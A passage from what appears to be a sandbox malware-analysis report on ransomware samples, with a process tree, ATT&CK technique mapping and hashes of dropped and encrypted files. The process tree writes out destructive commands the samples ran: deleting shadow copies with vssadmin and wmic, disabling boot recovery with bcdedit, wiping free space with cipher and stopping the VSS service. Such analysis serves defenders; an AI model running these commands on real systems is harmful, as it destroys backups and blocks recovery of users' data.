                    "C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\Desktop\00344\Trojan-Ransom.Win32.Crypmod.aald-521e8b48c7c4d54ffeaee381118505215b0dd36ada17b5452e1eaacac4e3a70e.exe > nul
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:3900
                • C:\Users\Admin\Desktop\00344\Trojan-Ransom.Win32.Foreign.nzwr-d58a98fb618ee4194332e70779b2f2f78ec569e955c3b204ae6705ddbb13dbed.exe
                  Trojan-Ransom.Win32.Foreign.nzwr-d58a98fb618ee4194332e70779b2f2f78ec569e955c3b204ae6705ddbb13dbed.exe
                  2⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Suspicious use of SetThreadContext
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                  PID:2784
                • C:\Users\Admin\Desktop\00344\Trojan-Ransom.Win32.Gen.hee-7cf39ebb4409b13a7c153abff6661cc4d28d8d7109543d6419438ac9f2f1be57.exe
                  Trojan-Ransom.Win32.Gen.hee-7cf39ebb4409b13a7c153abff6661cc4d28d8d7109543d6419438ac9f2f1be57.exe
                  2⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Modifies system certificate store
                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                  PID:2724
                  • C:\Windows\SysWOW64\wbem\WMIC.exe
                    "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive
                    3⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4112
                  • C:\Users\Admin\AppData\Roaming\Ramik\ceqo.exe
                    "C:\Users\Admin\AppData\Roaming\Ramik\ceqo.exe"
                    3⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    • Adds Run key to start application
                    • Sets desktop wallpaper using registry
                    • System Location Discovery: System Language Discovery
                    • Modifies registry class
                    • Suspicious use of AdjustPrivilegeToken
                    PID:912
                    • C:\Program Files\Internet Explorer\iexplore.exe
                      "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\[HOW_TO_DECRYPT_FILES].html
                      4⤵
                      • Modifies Internet Explorer settings
                      • Suspicious use of SetWindowsHookEx
                      PID:4944
                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4944 CREDAT:275457 /prefetch:2
                        5⤵
                        • Drops desktop.ini file(s)
                        • System Location Discovery: System Language Discovery
                        • Modifies Internet Explorer settings
                        • Suspicious use of SetWindowsHookEx
                        PID:1788
                    • C:\Windows\SysWOW64\cipher.exe
                      "C:\Windows\System32\cipher.exe" /W:C
                      4⤵
                      • System Location Discovery: System Language Discovery
                      PID:5040
                    • C:\Windows\SysWOW64\cipher.exe
                      "C:\Windows\System32\cipher.exe" /W:F
                      4⤵
                      • System Location Discovery: System Language Discovery
                      PID:2568
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\tmp_daa942c4.bat"
                      4⤵
                      • System Location Discovery: System Language Discovery
                      PID:4148
                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                        wmic process call create "cmd.exe /c bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & vssadmin.exe delete shadows /all /quiet & net stop vss"
                        5⤵
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2592
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\tmp_68f27f7c.bat"
                      4⤵
                      • System Location Discovery: System Language Discovery
                      PID:3636
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\tmp_78631489.bat"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:4332
              • C:\Windows\system32\vssvc.exe
                C:\Windows\system32\vssvc.exe
                1⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:3384
              • C:\Windows\system32\NOTEPAD.EXE
                "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\READ_ME.txt
                1⤵
                • Opens file in notepad (likely ransom note)
                PID:3160
              • C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" D:\
                1⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks whether UAC is enabled
                • Enumerates connected drives
                • Modifies registry class
                PID:4584
                • C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                  "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe"
                  2⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Checks whether UAC is enabled
                  • Enumerates connected drives
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of SetWindowsHookEx
                  PID:3916
                  • C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe
                    "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe" 66476
                    3⤵
                    • Executes dropped EXE
                    • Suspicious use of SetWindowsHookEx
                    PID:2760
              • C:\Windows\system32\rundll32.exe
                "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Public\Desktop\KEY
                1⤵
                • Suspicious behavior: GetForegroundWindowSpam
                PID:3140
                • C:\Windows\system32\NOTEPAD.EXE
                  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Desktop\KEY
                  2⤵
                    PID:4640
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k netsvcs
                  1⤵
                  • Drops file in System32 directory
                  • Drops file in Windows directory
                  PID:340
                • C:\Windows\system32\cmd.exe
                  cmd.exe /c bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & vssadmin.exe delete shadows /all /quiet & net stop vss
                  1⤵
                  • Process spawned unexpected child process
                  PID:908
                  • C:\Windows\system32\bcdedit.exe
                    bcdedit.exe /set {default} recoveryenabled no
                    2⤵
                    • Modifies boot configuration data using bcdedit
                    PID:752
                  • C:\Windows\system32\bcdedit.exe
                    bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                    2⤵
                    • Modifies boot configuration data using bcdedit
                    PID:3012
                  • C:\Windows\system32\vssadmin.exe
                    vssadmin.exe delete shadows /all /quiet
                    2⤵
                    • Interacts with shadow copies
                    PID:2240
                  • C:\Windows\system32\net.exe
                    net stop vss
                    2⤵
                      PID:3844
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 stop vss
                        3⤵
                          PID:4868

                    Network

                    MITRE ATT&CK Enterprise v15

                    Reconnaissance

                    Resource Development

                    Initial Access

                    Execution

                    Windows Management Instrumentation

                    1
                    T1047

                    Persistence

                    Boot or Logon Autostart Execution

                    1
                    T1547

                    Registry Run Keys / Startup Folder

                    1
                    T1547.001

                    Event Triggered Execution

                    1
                    T1546

                    Component Object Model Hijacking

                    1
                    T1546.015

                    Privilege Escalation

                    Abuse Elevation Control Mechanism

                    1
                    T1548

                    Bypass User Account Control

                    1
                    T1548.002

                    Boot or Logon Autostart Execution

                    1
                    T1547

                    Registry Run Keys / Startup Folder

                    1
                    T1547.001

                    Event Triggered Execution

                    1
                    T1546

                    Component Object Model Hijacking

                    1
                    T1546.015

                    Defense Evasion

                    Abuse Elevation Control Mechanism

                    1
                    T1548

                    Bypass User Account Control

                    1
                    T1548.002

                    Direct Volume Access

                    1
                    T1006

                    Impair Defenses

                    3
                    T1562

                    Disable or Modify Tools

                    3
                    T1562.001

                    Indicator Removal

                    3
                    T1070

                    File Deletion

                    3
                    T1070.004

                    Modify Registry

                    8
                    T1112

                    Subvert Trust Controls

                    1
                    T1553

                    Install Root Certificate

                    1
                    T1553.004

                    Credential Access

                    Credentials from Password Stores

                    2
                    T1555

                    Credentials from Web Browsers

                    1
                    T1555.003

                    Windows Credential Manager

                    1
                    T1555.004

                    Unsecured Credentials

                    3
                    T1552

                    Credentials In Files

                    3
                    T1552.001

                    Discovery

                    Browser Information Discovery

                    1
                    T1217

                    Peripheral Device Discovery

                    2
                    T1120

                    Query Registry

                    5
                    T1012

                    System Information Discovery

                    6
                    T1082

                    System Location Discovery

                    1
                    T1614

                    System Language Discovery

                    1
                    T1614.001

                    Lateral Movement

                    Collection

                    Data from Local System

                    3
                    T1005

                    Command and Control

                    Web Service

                    1
                    T1102

                    Exfiltration

                    Impact

                    Defacement

                    1
                    T1491

                    Inhibit System Recovery

                    3
                    T1490

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\OWOW64WW.cab.id-D0CD2F5E.[[email protected]].arrow
                      Filesize

                      23.5MB

                      MD5

                      94e5f65dc96119d0226772b9040838aa

                      SHA1

                      415dd1d3e79f0f423813fb967bdbeaf209158e3e

                      SHA256

                      89a7bca9c6e49e6684792c734b72f8205dc3752fc7192e778a890ac5daee7d4b

                      SHA512

                      ec7035de9b9352715c3bbdcc992fb46ec0548a03b839c99a5f21da8c3273672b8fb7d2a2abef0feaae5b2fe6df02038a5356d10c80a0830219dd00b225e0eea7

                      Download Submit

                    • C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll
                      Filesize

                      786KB

                      MD5

                      dd5ce4d765edd75eba6f311e6e0ea10a

                      SHA1

                      9ea7f6516e5ad0755b74463d427055f63ed1a664

                      SHA256

                      64b7f8f70a7b037d10da72eaa769078b7e4d1ac8964c5eae5515d373e816ed6d

                      SHA512

                      d2782310df7cc533cc9ffaf5c1903d5bc6a500c3bbe48148c1339fb5de19c835e4a8c765da1b80b3744ea231353f76f22ba4e04c78a3d950d7ee291d6eab2216

                      Download Submit

                    • C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dll
                      Filesize

                      1.2MB

                      MD5

                      de5f74ef4e17b2dc8ad69a3e9b8d22c7

                      SHA1

                      42df8fedc56761041bce47b84bd4e68ee75448d2

                      SHA256

                      b89a6a57b48be10103825440d2157f2c4a56e4c6b79ad13f729429cd5393bf32

                      SHA512

                      515e9b498d8cd9bb03f8d9758e891d073627dfd6fb0b931650a47d6e53722aa6e1cc3caff8c0e64f4721ad2abef7a81ef4e7b49952d3c8fc325deb5bba6b3314

                      Download Submit

                    • C:\Program Files (x86)\Chameleon Explorer\Folder.dll
                      Filesize

                      750KB

                      MD5

                      fb76f4f533203e40ce30612a47171f94

                      SHA1

                      304ba296c77a93ddb033d52578fcc147397db981

                      SHA256

                      3de05f18ffe9fda589a45ea539a464e58a30f70d59d71444b018064cf831c4a6

                      SHA512

                      a416a6d6efbbd69209e1867f12b9d1d11b21160f6dfe07c510b43112c22c317f805c67dd9402744a6c7e1541f6b3a061c49942fe28fa70f74aea670ba9c71995

                      Download Submit

                    • C:\Program Files (x86)\Chameleon Explorer\Folder64.dll
                      Filesize

                      1.2MB

                      MD5

                      96f92c8368c1e922692f399db96da1eb

                      SHA1

                      1a91d68f04256ef3bc1022beb616ba65271bd914

                      SHA256

                      161408b86eed7c4d9a5882aa00df3f8765ed28fa4fd9aab2c9b3dceadbd527f9

                      SHA512

                      b3d3fb2d78fe2df864f0e07a8bc1610ee9d65251957e0495a34c1631895293590e0fca965ec9deb160f48a4e09a2feabd3bff6fb9a0c22888a941e308de39d14

                      Download Submit

                    • C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\AppConfigurationInternal.zip.id-D0CD2F5E.[[email protected]].arrow
                      Filesize

                      2KB

                      MD5

                      ccde3fb44c0456ef1f89f7a25a883e8d

                      SHA1

                      d9a8b415313ba96136f5903a40b38e86ed28fb0d

                      SHA256

                      89d2ac8c9eb5f2a71889d230a4f391bf2aa3f6184e2e07fed16957fb1444bdc6

                      SHA512

                      2b51778ced5b112b2e6c1bcbd23938708e2ef267c1b83b92659c7902dda9d305a6250a1231cc53e58450d1d649c837e1e17318a409586850c983872d186a79a2

                      Download Submit

                    • C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\AssemblyInfoInternal.zip.id-D0CD2F5E.[[email protected]].arrow
                      Filesize

                      2KB

                      MD5

                      b136473bf965b604ad2c7e7d75a1fd90

                      SHA1

                      cbedce3bbc91d18672c43a558e1a1aa839da4567

                      SHA256

                      516ca4bdfdc4ab3e5898d2b60ca434388c0a5bf2cce420f3675a1ae2deab8388

                      SHA512

                      caa919935bf1d9f3b8388d390a482f1c3253a62110751bd9ebe5faa3e1e871aa1f384df560a68bcb415737240a4729091934d8600d490150721cb20284ef2c3d

                      Download Submit

                    • C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Class.zip.id-D0CD2F5E.[[email protected]].arrow
                      Filesize

                      1KB

                      MD5

                      f8a8e838cafbe8bbb945a9e4e2fdb5bc

                      SHA1

                      164438263fb2c3b3333a69411264c3530eec7fbe

                      SHA256

                      73f56b0dcdc0a0ca1b76347c00de28b2397ce6c4035076dcb782600bcf0806d4

                      SHA512

                      7b236311ce9a6520cdc6829422eff20e110a45ac018fa273e073b00d1d5ceb4efcf5f161b222aa258fc22f28dbaae5c463ae4ff6a2120efe22ebc42af3cd8d9c

                      Download Submit

                    • C:\Program Files (x86)\desktop.ini.id-D0CD2F5E.[[email protected]].arrow
                      Filesize

                      1KB

                      MD5

                      5ed34f179ef9ba8dd43fcb402d7d8e6e

                      SHA1

                      8663ca729f56384f66cf216832f96f03cfcb6757

                      SHA256

                      ddb9ee33c5ec865744b6015449491bcd95bc2282d2b664454495bfff1b124041

                      SHA512

                      5bf8138bc851807d53820cf6518a03708900f8071d0aefced7f8901bb8a50c942ec1887804c1097ad59b15094494fb92576979095bbe4d37f72cdfe9b60a66a8

                      Download Submit

                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC
                      Filesize

                      914B

                      MD5

                      e4a68ac854ac5242460afd72481b2a44

                      SHA1

                      df3c24f9bfd666761b268073fe06d1cc8d4f82a4

                      SHA256

                      cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f

                      SHA512

                      5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

                      Download Submit

                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
                      Filesize

                      1KB

                      MD5

                      a266bb7dcc38a562631361bbf61dd11b

                      SHA1

                      3b1efd3a66ea28b16697394703a72ca340a05bd5

                      SHA256

                      df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

                      SHA512

                      0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

                      Download Submit

                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC
                      Filesize

                      252B

                      MD5

                      594df131b48fe47455457239dbfcc57b

                      SHA1

                      f57c267c5cb70f84f55c4d954e880e475317bea0

                      SHA256

                      09096510aab00016ee7f9b5ec3b2cde29fad933bb2b53e71b68b20d926b116b3

                      SHA512

                      ba7991cddb96495d64ee8a4234ccce53e7fe29b61bbee5a6df71abe6ed59cd7f5e311f7768cb0efabff25962997aa9e87dfcebceb8733ba530662bfb986a558a

                      Download Submit

                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                      Filesize

                      342B

                      MD5

                      4f1a95f3288ee21e7a0739c99fb2404a

                      SHA1

                      cb7e38bb78d1f588bfe2f2ab0d8d5bacec6b3329

                      SHA256

                      0bfb53f784ae61c41069bc757c4c411b2eeb78c881c835e69574e4e413162a79

                      SHA512

                      443c0e78837b1c9e2fb396034ccea0302b9e6277b31393103fe0137690820fd8b51d6ee8f49563dae1ea14c35d6bc4358d5c59fa19c1038c5974a06a29c03217

                      Download Submit

                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                      Filesize

                      342B

                      MD5

                      cd1ddd23443b8d9fb47dc9342bf616d3

                      SHA1

                      a8811de0c1fbfeaacf87134b1c359edf4238f315

                      SHA256

                      f36d5e64fd8667d9c1073f7c09a8574b471086c082e5a93bf95aa226e7cce323

                      SHA512

                      1239bebe0133e419ef019da7c6ee707186bcf32d541048b6def24dd9883c93559d7f895ad3e3d3551dc1c5856d24362602feda1138133c5a16caaf538c8f7684

                      Download Submit

                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                      Filesize

                      342B

                      MD5

                      ae331b6f8d6489fad7c45906d6e60d4f

                      SHA1

                      79d7339d90abcbb997f28e4774e6db1b6e8fdd3f

                      SHA256

                      f961a7091e4c57e878ff3b19a6290990e06b4c3b69b073cd04855648c5bc7fa8

                      SHA512

                      1c992028b188afef985f876a1dbd2c39b9d9acb3e8731c5d1f14308e8bae2ee61eaaf3a1ae6d1be805b58340fc5eb369511b49f0c513347ef099ec6a94e487c4

                      Download Submit

                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                      Filesize

                      342B

                      MD5

                      4584189e0f37203993b387de4f93308f

                      SHA1

                      7e3ed3f159564f658132682d582ab138d756bb83

                      SHA256

                      59fe04b6d91f7155edda3c21670165c848616c1ba68e3ed6e0e28aecf6d24ba0

                      SHA512

                      2bb0b4df182d2a6cf698ab3c9a8f744b67871bd29c47f380dbd0618fda204e4dc4e6b4986e866b0d8c43b3070685f6aff6e0a008f8dc3f016bb99d9779761e87

                      Download Submit

                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                      Filesize

                      342B

                      MD5

                      4ee827e880112d292d706534de875b0b

                      SHA1

                      6c80295bfda5846b8dd5c4e0d8770f83c01dfd36

                      SHA256

                      6327527a7022b27a297367a7c78eb3aee113e55d319fab4f0434ba2e9769d40f

                      SHA512

                      d3357c882638474e246020cb82973cc1bcbe158d33278759e4b8508a9db25ac358a132ca8e2b2ffeca9fa7359b53268cf17a9996c761dcf2fb67b8d40891cc32

                      Download Submit

                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                      Filesize

                      342B

                      MD5

                      ce11f3e861c067171e17fa29f1382050

                      SHA1

                      7a439821f789e6682cb1e30a0ca344527b292298

                      SHA256

                      b8d0b092146a4d1abb8dbecc22645ad19432385f34220f072197cc961caa59b5

                      SHA512

                      d50b7e932a996d49b2c0a6f41444c49e0072ffd9741ad24b439e059cff0d2243d6c9cb027f0c9d3232f577325ae295b2f601de91fab520ea095070d8c2fd45fd

                      Download Submit

                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                      Filesize

                      342B

                      MD5

                      b04df29e5834185706c2a93e4ca629bc

                      SHA1

                      fe782f25db7372f4827031d4626c703b01139efe

                      SHA256

                      19c611582ed4798dbf44d0141ce1fed4e93c90567615fbf9b1b8d2e3145f2d18

                      SHA512

                      1681d14064e00b06bec645ea4a0928e71c0749780444bb43b23762769900fab6c64b44ab4341160daac2bd0efaa296bdb3196145b63ff125173d8ff4911abb37

                      Download Submit

                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                      Filesize

                      342B

                      MD5

                      6932148f7619467807c9bfceb97f4817

                      SHA1

                      ad7728c99b2070b558ee4d1976a970f3551f2483

                      SHA256

                      baeabb75959878d1dd9a90b991e47212c1ce1d5f8f2508da09a1de9a223ec651

                      SHA512

                      4e7e6d8cd1a89953fbd0693af8ab6f2ec518a1b65ec83b245400d64cd6c47fba73d2eb3528694a166006fefa25ae8e815e138ba1b131791aca51ad6de86c460c

                      Download Submit

                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
                      Filesize

                      242B

                      MD5

                      a5f26ab9d71740858ca0e1b9d1d572cd

                      SHA1

                      fa2bd933c5509e68981c11e65b899625b2cdff67

                      SHA256

                      2891f2485891569ab281a1a4794f4ec3954203ad09e9fd5bbbaf766d431d2538

                      SHA512

                      8d32747ff68f55bce1f557ba6857c6cd03cb2953e522bf736ebe3870e3dba4f4261c16465206f81c17c616e3407b6eee3d4b6af37e15102c151af1077f9d4148

                      Download Submit

                    • C:\Users\Admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
                      Filesize

                      4KB

                      MD5

                      da597791be3b6e732f0bc8b20e38ee62

                      SHA1

                      1125c45d285c360542027d7554a5c442288974de

                      SHA256

                      5b2c34b3c4e8dd898b664dba6c3786e2ff9869eff55d673aa48361f11325ed07

                      SHA512

                      d8dc8358727590a1ed74dc70356aedc0499552c2dc0cd4f7a01853dd85ceb3aead5fbdc7c75d7da36db6af2448ce5abdff64cebdca3533ecad953c061a9b338e

                      Download Submit

                    • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bz1ih2a5.default-release\[HOW_TO_DECRYPT_FILES].html
                      Filesize

                      8KB

                      MD5

                      2c063b324abdd7ea4b2fce565f98cf93

                      SHA1

                      611a439e07fc664952e05c0a73af9c736d01abbb

                      SHA256

                      f468fe2e887997cd7e1d5f95505c0a072d8f61b2fecc1ccb1416400b6de52489

                      SHA512

                      a48d432bd645a19003e89e18ed0e1bb4d62cecb7563d1dbec217748ed9e84484e2a3979b5429c64c67aa105d9235dc353f36905aac02c6f1bed3c8b59d96d332

                      Download Submit

                    • C:\Users\Admin\AppData\Local\Temp\Cab6163.tmp
                      Filesize

                      70KB

                      MD5

                      49aebf8cbd62d92ac215b2923fb1b9f5

                      SHA1

                      1723be06719828dda65ad804298d0431f6aff976

                      SHA256

                      b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

                      SHA512

                      bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

                      Download Submit

                    • C:\Users\Admin\AppData\Local\Temp\Regedit\A6F228P5-F8G1-F1T6-B1X3-I7P6I4R8F6F5
                      Filesize

                      28B

                      MD5

                      abd00d2164331245130b8bbe380eec67

                      SHA1

                      7d4fd0bda8ef265985fea2be047dc5e6a00caae2

                      SHA256

                      8b91fd2ca7f21230eeee2479b9aed27b1fe53a9b32843a0c25fd27d92471ee1c

                      SHA512

                      af3e874bda44486413ae5d4b4b6d93e813beb6f6dca1eed4978da373c0a5178bb1f63889bbfa0a88955c7955201863e50866af53857c2d898dfd75f20f027979

                      Download Submit

                    • C:\Users\Admin\AppData\Local\Temp\Regedit\Regedils.vbs
                      Filesize

                      1024B

                      MD5

                      f5b82627a90b60ddc68ac1964cb749dc

                      SHA1

                      3356765c14ec141be30c735b1133bdb4d87d805d

                      SHA256

                      b3952166f7014daae15832bf2fcce89144b7534fef6ea2c28d89ae93e77bb384

                      SHA512

                      ed243a59ce10a4bd1bd4d5f526f4b0a9fb0f148d1fbbad841a6ffb74bb3a7820c7074c1a9cacbdfc08c912df4632a307240c9ac9a04f3e2596af031bb4f661b0

                      Download Submit

                    • C:\Users\Admin\AppData\Local\Temp\Tar6175.tmp
                      Filesize

                      181KB

                      MD5

                      4ea6026cf93ec6338144661bf1202cd1

                      SHA1

                      a1dec9044f750ad887935a01430bf49322fbdcb7

                      SHA256

                      8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

                      SHA512

                      6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

                      Download Submit

                    • C:\Users\Admin\AppData\Local\Temp\is-ABBUB.tmp\_isetup\_setup64.tmp
                      Filesize

                      6KB

                      MD5

                      e72a1274570ccfbddeb9312c2ecb5bbc

                      SHA1

                      22b0624839a1b904ce8e6aa383b42e01e86f71dc

                      SHA256

                      32d914bdae4a76c34d2411566ded35e7611d04a7462a760efc7411b55f3dfd70

                      SHA512

                      317bf76a09b7b78b005a970f89ced24ad131cd9bbd6f6c12f71db671bacab33b77176f500140b1248e5945fdf9efafece4d8bd65998e3609b24a3acfbbb02308

                      Download Submit

                    • C:\Users\Admin\AppData\Local\Temp\is-ABBUB.tmp\background.bmp
                      Filesize

                      217KB

                      MD5

                      2a1df2f93ab738e809f4c0aa347df6f0

                      SHA1

                      5dbe8382e64d088c88b938bb654432017c802629

                      SHA256

                      b2a37720b86d15f06bf70774fe0d7011c96e9c3ff4ba2b7ab47f12efc89eb2b5

                      SHA512

                      b25011975c2438b0bffd537ece262369a2220937b43fc41618af6dd628c3ac3f49e4e0c68e1f04205069f183cc82730ae247d7c8d25d0445acb7859ab70ff30c

                      Download Submit

                    • C:\Users\Admin\AppData\Roaming\5A410D66-F84F-4A6B-9B29-3982FEBE58D9\run.dat
                      Filesize

                      960B

                      MD5

                      4a2bb3d77458f17a88ece00135494779

                      SHA1

                      38d69332ece6cea208458c7052f0c5474b9644c0

                      SHA256

                      0ccd8218676b140cf7d66b9fc134212c21768ae97d732eb96ee12d96624a6147

                      SHA512

                      0c79ada465b8b36d86c6a604a417e6dc6b8ae9bc03e5696290dd91111feb66c2278e71aedf9223e7c47d11160c70ed082cc92ba2de9975d31c19fc3a338cc00c

                      Download Submit

                    • C:\Users\Admin\AppData\Roaming\Service.exe
                      Filesize

                      794KB

                      MD5

                      7d138f70fb4f39ad1706951f0a68269d

                      SHA1

                      389c5151c973bd92beee59ebb070b56fb0f0b255

                      SHA256

                      2c7706e1e67bf8eb4696faeb1156e7f2cd1cb57280807ade1d42014caca02258

                      SHA512

                      a7c6810a53cd6dc9fd724aa29d314d68dae026ca04e32e475ebaee7d527f43be090b9460f048d192fccf16e08ff13bab9cf1e406e7605351f5a74957bd71596e

                      Download Submit

                    • C:\Users\Admin\Desktop\00344\HEUR-Trojan-Ransom.MSIL.Blocker.gen-2fa71c16ce2bf85c569d2a8de20fafe994bb08a08865c21b49d0d6f2ed6a10e0.exe
                      Filesize

                      793KB

                      MD5

                      1f2d6a784f6c0a5dc36be0019eb68657

                      SHA1

                      a833bbc122fbea12243b06a2e0fe41e3e104d8fd

                      SHA256

                      2fa71c16ce2bf85c569d2a8de20fafe994bb08a08865c21b49d0d6f2ed6a10e0

                      SHA512

                      d8a5c93f75e91036ce0672fa1495dc409d04d12dbb4a156b4e4a9ff633c641c80bc19afd1006fed3b87af09975f1059bf2d14f6f3ba07d671d076ea796259f4c

                      Download Submit

                    • C:\Users\Admin\Desktop\00344\HEUR-Trojan-Ransom.Win32.Blocker.gen-2843f5bb3a5c0895d62f40d8d291ec1f537c9a07581c592e723aa74b22e4d4d4.exe
                      Filesize

                      601KB

                      MD5

                      0c247bd6bc404c2bcd87feff5f3d0cca

                      SHA1

                      b57486d7ae9870b9de3c47112e5dc013e57fbeb7

                      SHA256

                      2843f5bb3a5c0895d62f40d8d291ec1f537c9a07581c592e723aa74b22e4d4d4

                      SHA512

                      ba5fc1f4b6ad7e14aef1cd7ad8db8bafd986fc921a10c803266754e03b276067f22ce5aba14f6853f847ae34904912001e8e607b3c8a015b49be51ba37267017

                      Download Submit

                    • C:\Users\Admin\Desktop\00344\Trojan-Ransom.Win32.Blocker.ljet-e6f1e62524e0e65cbff009b4b3f10c5799c4244e550b6a84235ac766f730b8e5.exe
                      Filesize

                      614KB

                      MD5

                      67eaa4777ed8eab212530d7dce0a8493

                      SHA1

                      b10acc0805655172fbb01c079a934bf4abe6dde3

                      SHA256

                      e6f1e62524e0e65cbff009b4b3f10c5799c4244e550b6a84235ac766f730b8e5

                      SHA512

                      9aba702325fb31b11f949ba5f88f09eb275de3575409502a27e2bf9be81a45d41b67e71ee3575c99cc11bd5d8ea93a5d3070ecdebe99adb59aa39dd44ff53604

                      Download Submit

                    • C:\Users\Admin\Desktop\00344\Trojan-Ransom.Win32.Blocker.lktw-9f7876454ef063bca2c9a91871842171314af89d75dafc07730a52c19144d6d4.exe
                      Filesize

                      8.3MB

                      MD5

                      a1008cadb237043baf8eda8e3e6854d2

                      SHA1

                      3abfa8c368b1777fa6271134350e47755c02d9e7

                      SHA256

                      9f7876454ef063bca2c9a91871842171314af89d75dafc07730a52c19144d6d4

                      SHA512

                      58a16112d412cc0fc677a5466488af4899c34ba2e73665d9abe9746e9514bcbf6bdfe7c045698ab330e666b95e91959da8eba022fe55699f9c0e2b692091cd14

                      Download Submit

                    • C:\Users\Admin\Desktop\00344\Trojan-Ransom.Win32.Crusis.to-9d9a23d41135defde86a0c0e0f7887586db1324efde2cd319987a905e97879fa.exe
                      Filesize

                      92KB

                      MD5

                      df3b5f98a4de732dc7c005b817f7fa70

                      SHA1

                      6fecfeb1c43de3b21a370075e02ca7991b71aa66

                      SHA256

                      9d9a23d41135defde86a0c0e0f7887586db1324efde2cd319987a905e97879fa

